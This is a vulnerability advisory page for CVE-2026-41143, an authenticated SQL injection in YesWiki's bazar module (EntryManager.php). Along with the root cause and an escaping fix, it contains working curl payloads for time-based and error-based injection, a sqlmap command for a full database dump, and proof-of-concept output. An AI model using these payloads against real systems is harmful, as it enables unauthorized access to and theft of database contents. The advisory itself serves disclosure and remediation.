Cloud Vulnerability DB
A community-led vulnerabilities database
Vulnerability DatabaseCVE-2026-41143
CVE-2026-41143:
PHP vulnerability analysis and mitigation
Vulnerability Details
YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization.
Vulnerable Code (EntryManager.php:704):
$result = $this->dbService->loadSingle(
'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
"WHERE tag='" . $data['id_fiche'] . "'"
);Attack Path:
- Attacker authenticates as any user (route requires
acl:{"+"}) - POST
/api/entries/{formId}withid_fiche=' OR SLEEP(3) OR ' ApiController::createEntry()checksisEntry($_POST['id_fiche'])→ false (not existing entry) → callscreate()create()→formatDataBeforeSave()→ SQL injection at line 704
dbService->loadSingle() passes raw string to mysqli_query() with no escaping. The escape() method exists but is NOT called here.
Docker PoC confirmation:
- Normal query:
SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry'→2024-01-01 00:00:00 - Injected:
WHERE tag='' OR SLEEP(3) OR ''→ elapsed: 3.00s (SLEEP confirmed) - Time-based blind SQLi enables full database dump via binary search
Steps to Reproduce
Prerequisites: Any authenticated user account on a YesWiki instance with a bazar form (id_typeannonce) created. Step 1 – Obtain session cookie (standard login via web UI or API) Step 2 – Time-based blind SQLi (confirm vulnerability):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' OR SLEEP(3) OR '"→ Response delays ~3 seconds confirming SQL injection. Step 3 – Error-based SQLi (version exfil):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' AND extractvalue(1,concat(0x7e,@@version))-- -"→ Returns MySQL version in XPATH error: XPATH syntax error: '~8.4.8'
Step 4 – Full dump via sqlmap:
sqlmap -u 'http://TARGET/?api/entries/1' \
--data "antispam=1&bf_titre=T&id_fiche=test" \
-p id_fiche --cookie "wikini_session=<SESSION>" \
--dbms=MySQL --technique=BET --level=2Docker PoC Output (confirmed)
[STEP 1] Normal input: Result (2024-01-01 00:00:00)
[STEP 2] id_fiche=' OR SLEEP(3) OR ' → Elapsed: 3.00s ← SLEEP(3) CONFIRMED
[STEP 3] id_fiche=' AND extractvalue(1,concat(0x7e,@@version))-- -
DB_ERROR: (1105, "XPATH syntax error: '~8.4.8'")Root Cause
In tools/bazar/services/EntryManager.php line 704:
$result = $this->dbService->loadSingle(
'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
"WHERE tag='" . $data['id_fiche'] . "'"
);$data['id_fiche'] comes from $_POST['id_fiche'] (user input). DbService::escape() exists but is not called here. loadSingle() passes the raw string directly to mysqli_query().
Proposed Fix
Replace the vulnerable line with parameterized query or call $this->dbService->escape():
$tag = $this->dbService->escape($data['id_fiche']);
$result = $this->dbService->loadSingle(
'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
"WHERE tag='" . $tag . "'"
);PoC Screenshot
Source: NVD
Related PHP vulnerabilities:
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management